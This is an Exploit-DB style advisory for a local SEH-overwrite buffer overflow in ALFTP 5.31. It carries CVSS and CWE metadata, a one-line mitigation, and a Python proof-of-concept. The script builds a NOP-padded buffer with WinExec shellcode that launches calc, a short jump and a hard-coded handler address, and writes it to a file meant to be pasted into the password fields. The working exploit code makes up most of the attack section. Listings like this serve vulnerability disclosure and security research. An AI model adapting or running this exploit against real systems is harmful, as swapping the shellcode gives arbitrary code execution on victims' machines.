ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)

vendor:

ALFTP

by:

Gokul Babu

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: ALFTP

Affected Version From: 5.31

Affected Version To: 5.31

Patch Exists: Yes

Related CWE: N/A

CPE: a:altools:alftp

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows XP Professional SP3 -Version-2002

2010

ALFTP 5.31 – Local Buffer Overflow (SEH Bypass)

A local buffer overflow vulnerability exists in ALFTP 5.31. By supplying a maliciously crafted input, an attacker can overwrite the SEH handler and execute arbitrary code. The vulnerability can be exploited by pasting the contents of alftp.txt in 'options->Preference->Security->New password &Confirm password'

Mitigation:

Upgrade to the latest version of ALFTP 5.31 or later.

Source

Exploit-DB raw data:

# Exploit Title: ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)        
# Exploit Author: Gokul Babu                  
# Vendor Homepage: http://www.altools.com/downloads/alftp.aspx                    
# Vulnerable Software: http://advert.estsoft.com/?event=201001127730323               
# Tested on: Windows XP Professional SP3 -Version-2002                    
# Steps to reproduce-1: (eip overwrite-88-windows-XP)
# Paste the contents of alftp.txt in 'options->Preference->Security->New password &Confirm password' 

#seh- 0041A6EF "\xEF\xA6\x41"
#address to jump 0012FA7A
#nseh- "\xEB\xAC\x90\x90"
#winexec address 0x7c862aed

#!/usr/bin/python

shellcode=("\x33\xC0"
"\x50"
"\x68\x63\x61\x6C\x63"
"\x8B\xC4"
"\x50"
"\xE8\x61\x30\x73\x7C")

buf="\x90"*4 + shellcode + "\x90"*(80-len(shellcode)) + "\xEB\xAC\x90\x90" + "\xEF\xA6\x41"

f=open("alftp.txt","w")
f.write(buf)
f.close()